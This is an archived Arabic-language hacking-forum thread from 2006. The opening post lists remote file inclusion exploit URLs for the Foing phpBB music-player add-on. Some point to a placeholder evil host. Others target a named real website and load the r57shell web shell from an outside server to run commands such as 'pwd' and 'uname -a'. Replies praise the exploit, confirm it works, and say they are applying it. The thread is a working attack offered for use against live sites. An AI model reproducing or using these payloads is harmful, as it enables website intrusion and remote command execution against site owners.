المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability


MeSa7eB
14-05-2006, 04:41
السلام عليكم ورحمة الله وبركاته

الثغره نزلت في مواقع السيكورتي على هذي الملفات فقط :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname
-a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname
-a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname
-a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname
-a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=una
me -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=un
ame -a


وانا كملت الباقي واكتشفت الثغره في 6 ملفات في نفس السكربت الي هي :

http://www.oslocal.net/forum/player/gen_pls.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

http://www.oslocal.net/forum/player/login.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

http://www.oslocal.net/forum/player/manage_songs.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

http://www.oslocal.net/forum/player/song_fetch.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

http://www.oslocal.net/forum/player/view_artist.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

http://www.oslocal.net/forum/player/view_song.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

البحث :

Powered by foing

اختراقات موفقة

يحب يتعلم
14-05-2006, 05:09
يديــــــــــــــــــــــــــك الف عافية


تحياتي

Dr.Fatal
14-05-2006, 05:24
يعطيك العافيه يالغاليـ تم التجريب وشغاله 100% ,,

تحياتـيـ,,

MeSa7eB
16-05-2006, 01:38
الله يعافيكم ..

احترامي

متكي ورا الشمس
16-05-2006, 04:27
بطل ,, على البركه الاكتشاف مسحب ,, وننتضر الاقوى ,,

_Neo__The_OnE
16-05-2006, 04:42
مشكورMeSa7eB
على الثغرة

MeSa7eB
18-05-2006, 07:41
الله يبارك فيكم ..

مشكورين على حسن المرور ..

احترامي

فـ الحربي ـهد
22-05-2006, 03:33
الله يعطيك العافيه وتسلم يا مسحب على الثغره

وجاري التطبيق ...

وننتر المزيد ...

نوفه
22-05-2006, 12:12
ماشاءالله عليك اخوي مسحب ابداع سلمت يديك

MeSa7eB
22-05-2006, 12:27
الله يسلمك اخت نوفه ..

احترامي

mom3gool
07-06-2006, 09:04
يعطيك العافيه ياوحش

دمت بود

Super-CrystaL
09-06-2006, 12:29
الثغره في ملف gen_pls.php


ثغرات الفايل انكلود كثيره لو الواحد يكلف على نفسه شوي ويبحث في السكريبتات بيحصل كثير


موفق اخوي مسحب


إلى اللقاء

mahmood_ali
09-06-2006, 04:28
مشكور اخوى تسلم إيدك

جزاك الله كل خير

موفق بعون الله

Mahmood_ali

مودي2
19-06-2006, 01:03
هللللللللللللللللللللللللللللللللللللللللللللللللل لللللو
تمااااااااااااااااااااااااااااااااااام

a_alsayad
13-07-2006, 02:52
رائع جداااااااااااااااااااااااااااااااا